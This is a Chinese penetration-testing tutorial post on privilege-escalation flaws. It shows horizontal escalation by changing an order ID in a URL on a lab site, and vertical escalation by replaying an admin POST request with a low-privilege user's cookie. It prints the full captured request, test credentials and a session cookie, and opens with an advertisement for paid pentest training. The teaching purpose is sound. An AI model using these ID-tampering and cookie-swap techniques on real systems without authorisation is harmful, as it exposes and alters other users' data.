[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用
1、什么是越权漏洞
越权漏洞是一种很常见的逻辑安全漏洞。可以这样理解:服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致攻击账号拥有了其他账户的增删改查功能。
越权漏洞分类
2、平行越权
就是相同级别(权限)的用户或者同一角色不同的用户之间,可以越权访问、修改或者删除的非法操作。
两个相同权限的账号分别是moonteam moon 密码都是x123456
这个是moon的订单
http://www.rbac.com/www/index.php/order-view-4.html
这个4的数字是可以变化的 查询3的时候 是moonteam这个用户的数据 查看1的时候是账号demo的订单。
![[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用](https://www.moonsec.com/wp-content/uploads/2019/11/image001-17-1024x503.png)
![[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用](https://www.moonsec.com/wp-content/uploads/2019/11/image002-17.png)
相同用户权限之间的越权就做水平越权
3、垂直越权
垂直越权是不同级别之间或不同角色之间的越权
用moon账号新建一个帖子 用admin登录系统得转帖的数据包。
POST /www/index.php/thread-transfer-5.html HTTP/1.1
Host: www.rbac.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.rbac.com/www/index.php/thread/5.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 13
Connection: close
Cookie: t=%2C4%2C; theme=default; frontsid=suuf9cuo95geo78r5mhgkilvr6; frontLang=zh-cn; productViewType=card
targetBoard=5
用moonteam的权限去转移帖子。
登录moonteam 账号 把cookie信息替换
![[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用](https://www.moonsec.com/wp-content/uploads/2019/11/image003-9.png)
转移成功
![[原创]WEB安全第五章 漏洞学习与利用12越权漏洞与利用](https://www.moonsec.com/wp-content/uploads/2019/11/image004-9-1024x415.png)
一般垂直越权 都是用一个普通账号是测试 较高的用户的一些操作比如增删该查。测试的方法就是cookie之间的替换。
4、带来的危害
越权查询
越权删除
越权修改
越权增加
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/329.html
mOon 